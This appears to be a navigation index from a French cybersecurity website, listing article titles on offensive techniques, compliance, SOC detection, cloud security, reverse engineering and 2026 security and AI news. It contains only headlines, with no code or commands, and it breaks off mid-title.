outils d automatisation sont devenus des cibles Équipements en fin de vie : maillon faible sécurité quand vos défenseurs travaillent pour l adversaire Pipelines IA en production : vos agents LLM sont des cibles Time-to-exploit : quand les 0-day brûlent en quelques heures OWASP Top 10 : Guide Complet Vulnérabilités Web 2026 Nessus et Greenbone : Guide Scanners Vulnérabilités ANSSI ReCyF : NIS2 en pratique, ce qui change pour vous Pipelines IA : vos clés API sont les nouvelles clés du SI Ransomwares : Pourquoi Vos Sauvegardes Ne Sauvent Plus CI/CD : L'Angle Mort de la Sécurité DevOps en 2026 Vos Outils IA : la Nouvelle Surface d'Attaque Ignorée Ransomware Trends Q1 2026 : Analyse des Groupes en 2026 IOC Management : Automatiser la Threat Intel : Guide Complet Cyber Threat Landscape France 2026 : Bilan ANSSI en 2026 Darkweb Monitoring : Outils et Techniques 2026 en 2026 InfoStealers 2026 : Lumma, Raccoon et RedLine en 2026 Supply Chain APT : Comprendre les Attaques Etatiques Top 10 des Attaques : Attaque, Détection et Défense 2026 Top 10 Outils Sécurité Kubernetes 2025 — Guide Pratique Livre Blanc : Sécurisation | Threat Intelligence 2026 Guide Complet Sécurité Active | Guide Cyberdefense Top 5 Outils Audit Active Directory 2026 [Gratuits + Commerciaux] Top 10 EDR/XDR 2026 : Comparatif Détaillé & Prix Top 10 Outils Audit : Guide Audit Sécurité 2026 Threat Hunting : Detection Proactive avec MITRE en 2026 APT29 2026 : Nouvelles TTP et Campagnes Cloud en 2026

Articles Techniques

108 articles
IDOR 2026 : Insecure Direct Object Reference [Guide Complet] Attaques XSS 2026 : Types, Exploitation et Défense [Guide] OSINT : Investigation Numérique et Renseignement Expert Retours d’Expérience Pentest : 5 Missions Terrain Anonymisées BloodHound vs SharpHound vs BloodyAD : Guide Comparatif 2026 Burp Suite vs OWASP ZAP : Quel Scanner Web Choisir en 2026 ? Nuclei vs Nessus vs Qualys : Scanners de Vulnérabilités Comparés Format String Exploitation Moderne : Du Crash au RCE en 2026 Race Conditions Kernel : Double-Fetch, TOCTOU et Exploitation BGP Hijacking et OSPF Exploitation : Attaques Routage Internet GPU Side-Channels : Attaques sur CUDA, OpenCL et WebGPU Intel ME et AMD PSP : Exploitation des Coprocesseurs Cryptanalyse Pratique : Attaques sur AES, RSA et ECC SGX, TDX et TEE : Attaques sur les Enclaves Sécurisées 2026 Hypervisor Escape : Techniques d'Évasion VMware, KVM et QEMU Linux Kernel Exploitation : Escalade de Privilèges Side-Channel Attacks : Spectre, Meltdown et Rowhammer ROP/JOP Chains : Exploitation Moderne des Binaires Protégés Heap Exploitation : Use-After-Free et Tcache Poisoning SGX, TDX et TEE : Attaques sur les Enclaves Sécurisées Hack The Box : Méthodologie pour Progresser en 2026 DVWA vs Juice Shop vs WebGoat : Comparatif Labs Web Lab Pentest Proxmox : Guide Complet d'Installation 2026 Top 5 Plateformes CTF et Entraînement Cyber en 2026 Architecture de Sécurité Matérielle Windows 11 & Server 2025 Windows Scheduler Internals : Architecture, Performance Architecture Windows Server 2025 : Noyau NT Expert Architecture Vertical Slice + Clean Lite : Guide 2026 Cryptographie Post-Quantique : Migration Pratique en 2026 Zero Trust Network : Implementation Pratique 2026 en 2026 C2 Frameworks Modernes : Mythic, Havoc, Sliver et Détection DNS Attacks : Tunneling, Hijacking et Cache Poisoning Exploitation de l’Infrastructure as Code Terraform et Exploitation des Protocoles Email : SMTP Smuggling et Att... GCP Offensive Security : Exploitation des Services Google Purple Team : Méthodologie et Exercices Collaboratifs Race Conditions et TOCTOU : Exploitation des Bugs de Windows Kernel Exploitation : Drivers, Tokens et KASLR Threat Intelligence : Automatiser la Veille Cyber en 2026 Attaques sur les Identity Providers Okta, Entra et Keycloak Attaques sur les Pipelines ML/AI et Empoisonnement de Mod... SSRF Avance : Bypass des Protections Cloud 2026 en 2026 Windows Kernel : Exploitation de Drivers Vulnerables Agents IA pour la Cyber-Défense et le Threat Hunting Cyber-Défense Agentique contre les APTs : Guide Complet Red Teaming des Agents Autonomes : Méthodologie et Shadow Hacking et Outils IA Non-Autorisés en Entreprise Container Escape : Techniques d'Évasion Docker et 2026 AD CS Exploitation 2026 : ESC1 à ESC16 [Guide Complet] Hardware Hacking : JTAG, SWD, UART et Extraction de Firmware Post-Exploitation : Pillage, Pivoting et Persistance Sécurité Mobile Offensive : Android et iOS en 2026 Service Mesh Exploitation : Attaques sur Istio, Linkerd et SIM Swapping et Attaques Telecom : SS7, Diameter et 5G UEFI Bootkits et Attaques sur le Firmware : Persistance A... Attaques sur les Bases de Données SQL, NoSQL et GraphQL Attaques CI/CD Avancées : GitOps, ArgoCD et Flux Attaques Serverless : Exploitation de Lambda, Azure Attaques sur les Smart Contracts et la Sécurité Web3 Attaques Wireless Avancées : Wi-Fi 7, BLE 5.4 et Zigbee Browser Exploitation Moderne : V8, Blink et les Sandbox Bypass FIDO2 et Passkeys : Attaques sur l'Authentification ICS/SCADA : Pentest d'Environnements Industriels en 2026 Supply Chain : Detecter les Dependances Malveillantes Incident Response : Playbook Ransomware 2026 : Guide Complet Reverse Engineering : Analyse de Firmware IoT en 2026 GraphQL Injection : Techniques d'Exploitation 2026 API Security : Fuzzing Avance avec Burp et Nuclei en 2026 Cloud Forensics : Investigation AWS et Azure : Guide Complet OAuth 2.1 : Nouvelles Protections et Migration en 2026 Pentest Wi-Fi 7 : Nouvelles Surfaces d'Attaque en 2026 C2 Frameworks 2026 : Mythic vs Havoc vs Sliver en 2026 DNS Tunneling Detection : Guide SOC Analyst : Guide Complet Phishing 2026 : Techniques Avancees de Spear-Phishing Web3 Security : Audit de Smart Contracts Solidity en 2026 Attaques sur CI/CD (GitHub Azure AD : attaques : Guide Expert 2026 Supply-chain applicative (typosquatting, dependency Secrets sprawl : collecte — Guide Expert 2026 SSRF moderne (IMDSv2, gopher/file, : Guide Complet NTLM Relay Moderne 2026 : SMB, HTTP, LDAP [Attaque + Defense] Evasion d’EDR/XDR : techniques : Guide Expert 2026 Phishing sans pièce jointe : Guide Expert 2026 Persistence sur macOS : Guide Expert 2026 WebCache Deception & cache : Guide Expert 2026 Abus OAuth/OIDC : Consent : Guide Expert 2026 Sécurité des LLM — Guide Expert 2026 Chaîne d'exploitation Kerberos en : Analyse Technique Living-off-the-Land (LOL-Bins/LOLBAS) à l’échelle Exfiltration furtive (DNS, DoH, : Analyse Technique Kubernetes offensif (RBAC abuse, : Analyse Technique Désérialisation 2026 : Gadgets PHP, Java, .NET, Python [Guide] Attaques sur API GraphQL : Attaque, Détection et Défense Escalades de privilèges AWS : Guide Expert 2026 OT/ICS : passerelles, protocoles : Guide Expert 2026 Cloud IAM : Escalade de Privileges Multi-Cloud en 2026 AWS Lambda Security : Attaques et Defenses : Guide Complet Terraform Security : Audit et Durcissement IaC en 2026 SIEM : Correlations Avancees pour Threat Hunting en 2026 Mobile Pentest : Bypass SSL Pinning Android 15 en 2026 Container Escape 2026 : Nouvelles Techniques Docker Bug Bounty 2026 : Strategies et Plateformes : Guide Complet Bypass EDR 2026 : Techniques de Contournement et Défenses ZED de PRIM’X : Conteneurs Chiffrés et Sécurité des Malware Analysis : Sandbox Evasion Techniques en 2026 Purple Team : Exercices Pratiques AD et Cloud en 2026 OSINT 2026 : Outils et Techniques de Reconnaissance Kubernetes RBAC : 10 Erreurs de Configuration Critiques

Conformité

63 articles
Risques Cyber Pré et Post Acquisition (M&A) : Guide DD Modèle PSSI : Politique de Sécurité SI Gratuite (ISO 27001) Fiche Mémo Transition ISO 27001:2022 (PDF Recto-Verso) Template SoA : Déclaration d'Applicabilité ISO 27001 (PDF) Kit Audit Interne ISO 27001 : 50 Questions Essentielles (PDF) Checklist ISO 27001:2022 — 93 Contrôles Annexe A (PDF Gratuit) Auto-évaluation Maturité SSI — Grille de Scoring (PDF Gratuit) RGPD et AI Act : Guide de Double Conformité 2026 ISO 42001 : Guide Complet du Système de Management de l'Intelligence Artificielle SOA ISO 27001 : Statement of Applicability Complet Feuille de Route ISO 27001 : Certification en 12 Étapes Checklist Audit ISO 27001 : 93 Contrôles Annexe A 2022 Charte Informatique Entreprise : Guide et Modèle Word Analyse de Risques ISO 27005 : Méthodologie Complète PSSI ISO 27001 : Guide Rédaction et Modèle Complet Aspects Juridiques et Éthiques de l’IA : Cadre Réglementaire Classification des données : méthodes et outils pratiques Analyse d'impact AIPD : méthodologie CNIL pas à pas NIS 2 et DORA : double conformité du secteur financier Maturité cybersécurité : modèles CMMC et NIST CSF 2.0 Cartographie des risques cyber avec EBIOS RM en 2026 SMSI ISO 27001 version 2022 : guide complet pas à pas Audit de conformité RGPD : checklist complète pour DPO NIS2, DORA et RGPD : Cartographie des Exigences Croisées IEC 62443 : Cybersécurité Industrielle OT - Guide : Guide Audit de Sécurité du SI : Méthodologie Complète et PRA/PCA Cyber : Plan de Reprise et Continuité d'Activité Qualification PASSI ANSSI : Devenir Prestataire d'Audit Audit de Sécurité Cloud : Checklist Conformite 2026 PCI DSS 4.0.1 : Nouvelles Exigences Mars 2026 en 2026 Conformite Multi-Referentiels : Approche Unifiee 2026 NIS 2 Phase Operationnelle : Bilan 6 Mois Apres en 2026 Aspects Juridiques et Ethiques de l'IA en Entreprise ISO/IEC 42001 Foundation : Système de Management IA ISO 42001 Lead Auditor : Auditer un Systeme de Management ISO 42001 Lead Implementer : Management de l’IA et RGPD et AI Act : Guide Complet pour les Organisations en ... Développement Sécurisé ISO 27001 : Cycle S-SDLC en 6 Cyber Assurance 2026 : Exigences et Marche Durci en 2026 SOC 2 Type II : Retour d'Experience Implementation DORA 2026 : Impact sur le Secteur Financier Francais Cyber-assurance 2026 : Nouvelles Exigences et Guide Complet AI Act 2026 : Guide Conformité Systèmes IA à Haut Risque Cyber Resilience Act 2026 : Guide Anticipation Produits C... DORA 2026 : Premier Bilan et Contrôles ACPR - Guide Complet NIS 2 Phase Opérationnelle 2026 : Guide Complet de Mise RGPD 2026 : Sécurité des Donnees et Enforcement CNIL - Gu... Certification HDS 2026 : Hébergeur de Données de Santé PCI DSS 4.0.1 en 2026 : Retour d'Expérience et Guide SBOM 2026 : Obligation de Sécurité et Guide Complet SecNumCloud 2026 et EUCS : Guide Complet Qualification Cryptographie Post-Quantique : Guide Complet pour les SI ... ISO 27001:2022 Guide Complet Certification Expert 2026 NIS 2 : Guide Complet de la Directive Européenne sur la SOC 2 : Guide Complet Conformite pour Organisations RGPD 2026 : Durcissement des Sanctions par la CNIL HDS 2026 : Certification Hebergement de Donnees Sante Cyber Resilience Act : Guide de Conformite Produits RGPD et IA Generative : Guide de Conformite CNIL en 2026 SecNumCloud 2026 : Migration et Certification EUCS AI Act Classification : Systemes a Haut Risque en 2026 SBOM 2026 : Obligation de Transparence Logicielle en 2026 ISO 27001:2022 vs ISO 27001:2013 : Differences Cles

SOC et Detection

35 articles
Suricata : IDS/IPS/NSM Open Source Multi-thread 2026 Graylog : Plateforme SIEM Log Management Open Core SentinelOne Singularity : XDR Autonome Powered by AI Audit DNS 2026 : Sécuriser SOA, SPF, DMARC, DNSSEC, DANE Microsoft Defender : Suite XDR Microsoft 365 en 2026 Splunk : Plateforme SIEM Observability (Cisco) 2026 Microsoft Sentinel : SIEM/SOAR Cloud Microsoft Azure 2026 CrowdStrike Falcon : EDR/XDR cloud-native, modules et prix Wazuh : Plateforme XDR/SIEM Open Source 2026 - Guide Complet Wazuh SIEM/XDR : Guide Déploiement et Détection 2026 Incident Triage : Classification et Priorisation SOC 2026 Threat Hunting Proactif : Techniques et Outils SOC 2026 Sigma Rules : Standard de Détection Universel Guide Complet SOC as a Service : Externaliser la Détection Guide 2026 XDR vs SIEM vs EDR : Comprendre les Différences en 2026 Purple Team : Collaboration entre SOC et Red Team Guide Détection du Mouvement Latéral : Guide Complet SOC 2026 Triage des Alertes SOC : Méthodologie Complète pour Analyste NDR : Détection Réseau et Réponse aux Menaces Guide 2026 SIEM Cloud-Native vs On-Premise : Comparatif Complet 2026 Log Management : Architecture et Rétention SOC : Guide Use Cases SIEM : 50 Règles Détection Essentielles : Gui SOC Metrics et KPIs : Mesurer la Performance : Guide Co SOAR : Automatisation Réponse Incident Guide : Guide Co Threat Intelligence Platforms : Comparatif 2026 : Guide Microsoft Sentinel : Déploiement et Règles KQL : Guide Splunk Enterprise Security : Configuration SOC : Guide Elastic SIEM : Stack Détection Open Source 2026 : Guide SOC Moderne : Architecture et Outils Guide 2026 : Guide Analyste SOC : Niveaux, Parcours et Compétences : Guide Threat Hunting : Méthodologie, Outils et Pratique pour Detection Engineering : Construire des Règles de : Guide Detection-as-Code : Pipeline CI/CD pour Règles SIEM et Sigma Rules : Guide Complet d'Écriture et Déploiement de Wazuh 2026 : SIEM/XDR Open Source — Guide Déploiement

Cloud Security

53 articles
Cloudflare : CDN, WAF, Zero Trust, Edge Compute 2026 Docker : Plateforme de Conteneurisation et Sécurité 2026 Kubernetes (K8s) : Orchestrateur Conteneurs CNCF en 2026 Falco : Detection Runtime Cloud-Native (CNCF) 2026 Audit Sécurité Pipeline CI/CD : SAST, DAST, SCA Intégrés Cloud IAM : AWS IAM vs Azure RBAC vs GCP IAM — Comparatif Kubernetes RBAC : Guide Sécurisation des Permissions Conditional Access Azure : Guide Complet Entra ID 2026 Cloud Forensics Avancée Post-Compromission sur AWS Pentest Cloud 2026 : Méthodologie AWS, Azure, GCP [Guide] Cloud Logging : Guide Centralisation et Monitoring Sécurité Cloud Network Security : Guide Complet VPC, WAF et DDoS DevSecOps Cloud : Guide Pipeline CI/CD Sécurisé Complet Cloud Disaster Recovery : Guide PRA et Résilience Cloud Cloud Compliance : Guide RGPD, HDS et SecNumCloud 2026 Cloud Forensics : Guide Investigation Incident Cloud 2026 Infrastructure as Code Security : Guide Terraform Complet Cloud Encryption : Guide Chiffrement Données et Clés KMS CASB : Guide Comparatif Cloud Access Security Broker 2026 Container Security : Docker et Runtime Protection Avancée Serverless Security : Sécuriser Lambda et Functions Cloud Multi-Cloud Security : Guide Stratégie Sécurité Unifiée Cloud IAM : Guide Gestion Identités et Accès Cloud 2026 Kubernetes Security : Guide Durcissement Cluster K8s 2026 Sécurité AWS : Guide Complet Hardening Compte et Services Azure Security Center : Guide Configuration Complète 2026 GCP Security : Bonnes Pratiques et Guide Audit Cloud 2026 CSPM : Guide Cloud Security Posture Management Complet CNAPP : Guide Protection Cloud-Native Applications 2026 ZTNA Zero Trust Network Access Cloud : Guide Complet Disaster Recovery Cloud : PRA Multi-Région en 2026 Attaques sur Metadata Services Cloud : SSRF et IMDS FinOps Sécurité : Cryptomining Ressources Fantômes Secrets Management Cloud : Vault et Key Vault 2026 Cloud Compliance NIS 2 SecNumCloud ISO 27017 Guide Sécurité Multi-Cloud : Stratégie Unifiée AWS, Azure et GCP Cloud Misconfiguration : Top des Erreurs de Sécurité et Cloud IAM : Sécurisation des Identités et Accès AWS, CSPM : Cloud Security Posture Management - Guide Complet Souveraineté Cloud : Protéger les Données Sensibles Container Registry : Guide Sécurité Images Docker 2026 Cloud Logging Monitoring : Visibilité Complète 2026 Service Mesh Security : Sécuriser Istio et Linkerd Cloud Pentest Azure : Exploitation Misconfiguration Terraform IaC Sécurisé : Checklist de Durcissement Cloud Pentest AWS avec Pacu et CloudFox : Le Guide Sécurité Serverless : Lambda Functions et Protection CNAPP Cloud-Native Application Protection Platform Kubernetes Security : RBAC et Network Policies 2026 GCP Security Command Center : Audit et Durcissement Azure Defender for Cloud : Guide Configuration 2026 AWS Security : Les 20 Services Sécurité Essentiels Sécuriser une Architecture Multi-Cloud AWS et Azure

Retro-Ingenierie

18 articles
Frida et DynamoRIO : Instrumentation Binaire Avancée 2026 Symbolic Execution : Angr, Triton et Découverte d'Exploits Analyse Mémoire Forensique : Volatility pour Malware Analyse de Shellcode : Techniques de Rétro-Ingénierie Rétro-Ingénierie de C2 : Cobalt Strike et Brute Ratel Anti-Analyse Malware : Techniques et Contournements Analyse de Stealers : RedLine, Raccoon, Lumma 2026 Unpacking Malware Avancé : Techniques et Outils 2026 Rétro-Ingénierie de Ransomware : Analyse Technique Analyse Dynamique de Malware Avancée : Sandbox Expert Anti-Rétro-Ingénierie APT - Techniques d'Évasion Avancées Disséquer l'Obscurité : Techniques Avancées de Déobfuscation IA Frameworks pour l'Analyse de Malwares - Deep Learning Malwares Mobiles & IA - Rétro-Ingénierie Cross-Platform Chasse aux Fantômes : Rétro-Ingénierie Ghidra : Guide de Reverse Engineering pour Débutants Fileless Malware : Analyse, Détection et Investigation Reverse Engineering .NET : Décompilation, Analyse et

News

492 articles
Cloudflare ampute 1 100 postes au nom de l'IA agentique Five Eyes encadre les agents IA dans les SI critiques Qualcomm bricole l'après-smartphone avec OpenAI et Meta JDownloader piraté : installeurs vérolés au RAT Python AWS US-EAST-1 surchauffe : Coinbase et FanDuel KO 5h CVE-2026-42208 : LiteLLM, le proxy IA piraté par SQLi MuddyWater : l'APT iranien recrute via Teams sous fausse bannière Chaos CVE-2026-42354 : Sentry SAML SSO, prise de compte via IdP malveillant DAEMON Tools : installeurs piégés sur le site officiel depuis avril Let's Encrypt arrête tout : trois heures sans certificats Dirty Frag : root sur Linux via xfrm-ESP et RxRPC Amazon Quick : l'IA de bureau d'AWS débarque sur PC Anthropic dreaming : Claude apprend de ses erreurs GPT-5.5-Cyber : OpenAI ouvre son IA aux red teams Cushman & Wakefield : 50 Go Salesforce publies par ShinyHunters Patch Tuesday 12 mai : Secure Boot, dernière fenêtre CVE-2026-23918 : Apache HTTP/2 double-free, RCE en cours Canvas piraté : 275 millions d'élèves et profs exposés Microsoft Agent 365 en GA : agents IA gouvernés à 15 $/user 276 arrestations : pig butchering, 701 M$ saisis en Asie Braintrust piraté : rotation forcée des clés API clients Meta licencie 8 000 personnes le 20 mai pour financer l'IA Gemini 3.1 Flash-Lite GA : Google casse les prix de l'IA vm2 : 12 CVE critiques, le bac à sable Node.js explose CVE-2026-31431 : Linux kernel 'Copy Fail' root, deadline 15 mai SimpleHelp CVE-2024-57726 : deadline CISA aujourd'hui CVE-2026-41940 : cPanel pillé, MSPs et gouvernements visés SAP rachète Prior Labs : 1 Md€ pour une lab IA en Europe MuddyWater se déguise en Chaos ransomware via Teams CVE-2026-0300 : Palo Alto exploité, patch que le 13 mai DAEMON Tools : backdoor signé, attaque depuis le 8 avril CAISI évalue Google, Microsoft et xAI avant publication Anthropic verse 200 milliards $ à Google Cloud sur 5 ans CVE-2026-0073 : Android frappé par un zero-click RCE via ADB sans fil Google Cloud Next 26 : Gemini Enterprise et identités d'agents en GA Trellix piraté : le cyberdéfenseur perd un bout de son code source ShinyHunters frappe Instructure : 275 millions d'utilisateurs Canvas exposés Stormshield Management Center : 10 CVE corrigées, RCE non authentifiée CVE-2026-32202 : Windows Shell exploité par APT28, CISA donne 6 jours Pentagon : 7 IA sur réseaux classifiés, Anthropic exclue GPT-5.5 sur AWS Bedrock : OpenAI s'invite chez Anthropic VENOMOUS#HELPER : 80 victimes via faux mails SSA et RMM DigiCert piégé par un .scr : 60 certificats EV révoqués CVE-2026-23918 : Apache HTTP/2 RCE, patch 2.4.67 Anthropic + Wall Street : 1,5 Md$ pour Claude en entreprise Everest revendique Fiserv : le coeur des paiements US visé CVE-2026-41940 : cPanel exploité contre des États et des MSP CVE-2026-4670 : MOVEit Automation rouvre la plaie de 2023 Shadow-Earth-053 : Pékin frappe un État NATO et la presse Bruxelles allège NIS2 pour 28 700 entreprises européennes Canvas piraté : ShinyHunters revendique 275 M de profils Roblox : 3 arrestations en Ukraine, 610 000 comptes piratés NSA teste Mythos d'Anthropic sur les failles Microsoft Liberty Mutual visé : Everest revendique 100 Go de données Norton Healthcare : 2,5 millions de patients exposés GitHub CVE-2026-3854 : RCE en un git push, 88 % vulnérables CVE-2026-32202 : Microsoft re-patche un zero-click NTLM exploité Amazon remet 25 Mds$ dans Anthropic : Trainium scale up Meta licencie 8 000 le 20 mai, Microsoft pousse des départs BlackCat : 4 ans pour les négociateurs devenus attaquants Microsoft Agent 365 en GA : la console pour gouverner les IA NCSC : préparez-vous à la patch wave dopée par l'IA CVE-2026-31431 Copy Fail : 732 octets pour un root Linux DragonForce + Scattered Spider : la galaxie cartel se structure Mini Shai-Hulud : SAP CAP infecté, l'IDE devient le vecteur Medtronic confirme la fuite : 9 millions de records pour ShinyHunters Trellix piraté : un repo de code source compromis ADT confirme : 5,5 M de clients exposés par ShinyHunters AppSheet : 30 000 comptes Facebook volés via Google Iran cible les PLC US : alerte CISA-FBI-NSA pour l'OT Apple Q2 2026 : 111 Mds$ de CA et 100 Mds$ rachetés SonicWall : 3 CVE Gen6/7/8, désactivez l'admin web KB5083769 casse les sauvegardes VSS sous Windows 11 AWS Interconnect : multicloud GA avec Google en premier Pentagone signe 8 IA en classifié, Anthropic écarté BlueHammer : CVE-2026-33825 Defender exploité en zero-day CVE-2026-35616 : FortiClient EMS exploité, hotfix urgent CVE-2026-41940 : 1,5 million de cPanel exposés à un bypass auth DEEP#DOOR : backdoor Python qui pille SSH, cloud et Wi-Fi CVE-2026-32201 : 1300 SharePoint exposés au 1er mai PyTorch Lightning : 2 versions PyPI volent vos secrets Qilin : 6 victimes en 4 jours, RDP enumeration au coeur du TTP CVE-2026-33827 : RCE wormable IPv6 dans la pile Windows TCP/IP CVE-2026-32202 : APT28 vole vos hashes NTLM en zéro-clic Checkmarx : LAPSUS$ publie 96 Go de code et de credentials Vimeo : ShinyHunters exfiltre via Anodot, ultimatum 30 avril Scattered Spider : Bouquet arrêté à Helsinki à 19 ans OpenAI sur AWS Bedrock : GPT-5.5 et Codex chez Amazon Anthropic retarde Mythos, OpenAI brief le Congrès cyber Telia Norge : 2 ans de géolocalisation exposée, Nkom enquête CVE-2026-25874 : LeRobot de Hugging Face exposé à un RCE non auth prt-scan : 500 PR malveillantes pilotées par IA sur GitHub CVE-2026-3854 : un seul git push pour prendre GitHub.com Europol démantèle un réseau crypto de 50 M€ basé à Tirana LiteLLM CVE-2026-42208 : pré-auth SQLi exploitée en 36h Copy Fail (CVE-2026-31431) : 732 octets pour root sur Linux Outlook : Copilot devient agentique pour gérer vos emails Carnival : 8,7 M de comptes publiés par ShinyHunters VECT 2.0 : ransomware devenu wiper, fichiers détruits Microsoft Defender RedSun : 2e Zero-Day en 15 Jours [2026] CISA KEV : ScreenConnect CVE-2024-1708 réactivée par exploitation cPanel/WHM : faille critique d'authentification, patch d'urgence Pékin bloque le rachat de Manus par Meta : 2 Md$ annulés Ineffable Intelligence : 1,1 Md$ seed pour un ex-DeepMind BlobPhish : phishing en mémoire vise Microsoft 365 Entra Agent ID Takeover : Vol Service Principal [2026] Vercel piraté via Context.ai : OAuth volé, Google compromis Hackers nord-coréens : Calendly piégé pour voler la crypto CVE-2026-32202 : Windows Shell, exploitation active confirmée Totolink A8000RU CVE-2026-7156 : RCE pré-auth, exploit public CVE-2026-40976 : Spring Boot expose Actuator sans auth (9.1) Google injecte 40 Md$ dans Anthropic, après les TPU eBay paralysé par DDoS : 313 Team revendique l'attaque DeepSeek V4 Pro : 1,6Tn paramètres, 1M tokens, prix cassés Outlook Panne Mondiale du 27 Avril 2026 : Analyse Cause Itron compromis : Snow malware sur 110M de compteurs IoT Microsoft : 8 500 départs volontaires pour financer l'IA CISA AA26-097A : CyberAv3ngers cible les PLC Rockwell aux États-Unis APT28 PRISMEX : steganographie et COM hijacking contre l'OTAN CVE-2026-32201 : 1 300 SharePoint exposés, deadline KEV ce 28 avril Cohere absorbe Aleph Alpha : 20 Md$ pour l'IA souveraine Litecoin : zero-day MWEB, reorg de 13 blocs en urgence PhantomRPC : Windows RPC élève au SYSTEM, pas de patch Checkmarx fuité par Lapsus$ : code source et MongoDB Pack2TheRoot CVE-2026-41651 : root Linux pour tous (8.8) ADT confirme une fuite : ShinyHunters menace 10 M de clients FIRESTARTER : APT persistant sur les pare-feu Cisco ASA Azure East US : panne 12 h, VMs et identité touchées CISA KEV : SimpleHelp et MagicINFO exploités (4 ajouts) LMDeploy CVE-2026-33626 : SSRF exploité en 12 heures Autovista : ransomware, 13 M de dossiers exposés Cisco SD-WAN Manager : CVE-2026-20133 exploitée nginx-ui CVE-2026-33032 : auth bypass exploitée (9.8) CrowdStrike LogScale : CVE-2026-40050 expose les fichiers UK Biobank : 500 000 dossiers santé en vente sur Alibaba ChatGPT Workspace Agents : OpenAI vise les entreprises GPT-5.5 : 1M Tokens, Reasoning et Tarifs OpenAI [2026] GopherWhisper : l'APT chinois cache son C2 dans Discord Bitwarden CLI piégé : Shai-Hulud infecte le gestionnaire Vercel confirme une intrusion, comptes clients exposés CanisterWorm : ver npm auto-propagé via pgserve RedSun : le zero-day Defender sans patch donne SYSTEM Lotus Wiper : le nouveau wiper frappe le Venezuela Rituals : fuite MyRituals, clients européens exposés DeepSeek V4 Pro et Flash : 1M tokens en open-source Security Copilot intégré à Microsoft 365 E5 en avril 2026 SharePoint : 1 300 serveurs exposés à la CVE-2026-32201 Mirai exploite CVE-2025-29635 sur les D-Link DIR-823X ANTS piratée : 19 millions de Français exposés sur le dark web BRIDGE:BREAK : 22 failles exposent 20 000 convertisseurs CVE-2026-40372 : Microsoft patche ASP.NET Core en urgence (9.1) FakeWallet : 26 apps piégées sur l'App Store iOS Kyber ransomware : Kyber1024 post-quantique testé Gemini Enterprise Agent Platform : Google frappe fort Meta : 8 000 licenciements le 20 mai pour financer l'IA The Gentlemen : 1 570 victimes exposées via SystemBC Anthropic verrouille 3,5 GW de TPU avec Google et Broadcom n8n CVE-2026-21858 : RCE non authentifiée CVSS 10 sur 100 000 serveurs CISA KEV 20 avril : 8 failles ajoutées, Quest KACE en CVSS 10 nginx-ui CVE-2026-33032 : takeover complet via /mcp_message (9.8) Axios npm piraté : Sapphire Sleet cible 100 M downloads Cisco ISE et Webex : 4 failles critiques CVSS jusqu'à 9.9 Claude Mythos : Anthropic bride son modèle le plus puissant Everest revendique Frost Bank, Citizens Bank : 380 Go volés Apache ActiveMQ CVE-2026-34197 : 6 400 serveurs exposés Gemini Notebooks : Google ouvre la feature au plan gratuit ShinyHunters : ultimatum 21 avril — Zara, Carnival, 7-Eleven SGLang CVE-2026-5760 : RCE 9.8 via modèle GGUF piégé Spinnaker CVE-2026-32604 : RCE non authentifiée CVSS 9.9 Oracle CPU avril 2026 : 483 patches, record trimestriel ChatGPT, Claude et Gemini HS simultanément le 20 avril Codex (OpenAI) masque un cryptominer pendant l'incident Kelp DAO : 292 M$ volés via LayerZero, Lazarus suspecté Vercel piraté via Context.ai : OAuth Workspace exploité ShinyHunters revendique la compromission de Rockstar Games BlueHammer CVE-2026-33824 : RCE Windows IKE en CVSS 9.8 Marimo CVE-2026-39987 : RCE exploitée 10 h après disclosure SAP CVE-2026-27681 : SQL injection ABAP notée 9.9 sur BPC Adobe Acrobat : CVE-2026-34621 exploitée depuis décembre Security Copilot inclus dans Microsoft 365 E5 le 20 avril KB5082063 : reboot loop des contrôleurs de domaine AD MCPwn (CVE-2026-33032) : nginx-ui détourné en deux requêtes Patch Tuesday avril 2026 : zero-day SharePoint exploité FortiClient EMS : deux failles 9.1 exploitées dès mars 2026 78 557 licenciements tech au Q1 2026, dont 48 % dus à l'IA PANAME : la CNIL outille la conformité IA Act des modèles Pushpaganda : Google Discover détourné par IA pour du scareware Operation PowerOFF : 53 domaines DDoS-for-hire démantelés Anubis revendique 2 To volés à Signature Healthcare Brockton Corée du Nord : Zerion piégé par IA, 100 000 $ volés NIST réduit l'enrichissement des CVE, 263% de hausse Claude Design : Anthropic lance son studio visuel IA n8n : webhooks abusés pour diffuser un agent RMM Datto W3LL : le FBI démantèle un kit phishing vendu 500 $ Microsoft Defender : RedSun et UnDefend restent non patchés Cookeville Regional Medical Center : 337 917 patients touchés par Rhysida 170 procureurs ukrainiens piratés par des hackers liés à la Russie Ni8mare : faille CVSS 10.0 dans n8n (CVE-2026-21858) OpenAI Codex prend le contrôle du Mac et navigue seul UAC-0247 vise hôpitaux ukrainiens avec CHROMELEVATOR McGraw Hill : 13,5 millions d'emails fuités via Salesforce Claude Opus 4.7 : Anthropic officialise son modèle phare PHANTOMPULSE : Obsidian détourné contre finance et crypto CVE-2026-20184 : faille critique SSO Cisco Webex corrigée ShinyHunters publie 78,6 millions de records Rockstar (GTA Online) CVE-2026-33032 : faille critique nginx-ui exploitee (MCPwn) CVE-2026-32201 : zero-day SharePoint exploite activement (BlueHammer) CamoLeak : faille critique GitHub Copilot Chat exploitée Claude IA détecte une RCE de 13 ans dans Apache ActiveMQ OpenAI lance GPT-5.4-Cyber, un modèle IA pour la cyber Hyperscalers : 700 milliards de dollars pour l'IA en 2026 APT28 déploie le malware PRISMEX contre l'Ukraine et l'OTAN Fausse app Ledger Live sur l'App Store : 9,5 M$ volés Fortinet corrige 11 failles dont 2 critiques dans FortiAnalyzer Booking.com piraté : données clients exposées et phishing ciblé SiFive lève 400 M$ pour ses puces IA open source RISC-V CrowdStrike : un réseau compromis en 29 minutes en moyenne Google Chrome lance les « Skills IA » pour automatiser vos tâches Adobe corrige un zero-day dans Acrobat Reader exploité depuis 5 mois Patch Tuesday avril 2026 : Microsoft corrige 167 failles Basic-Fit piraté : un million de membres européens exposés CVE-2026-39987 : RCE dans Marimo exploitée en 10 heures CVE-2026-35616 : zero-day critique dans FortiClient EMS (9.1) CVE-2026-20160 : RCE root critique dans Cisco SSM On-Prem JanelaRAT : le malware bancaire qui frappe l'Amérique latine Meta lance Muse Spark et tourne le dos à l'open source Microsoft prépare un agent IA autonome pour Copilot 365 Eclipse lève 1,3 milliard de dollars pour l'IA physique Waymo partage ses données de nids-de-poule avec Waze France : la nouvelle feuille de route cybersécurité 2026-2027 LexisNexis piraté : 400 000 profils exposés dont des agents fédéraux Drift : 285 millions de dollars volés par des hackers nord-coréens Smart Slider 3 : attaque supply chain sur 800 000 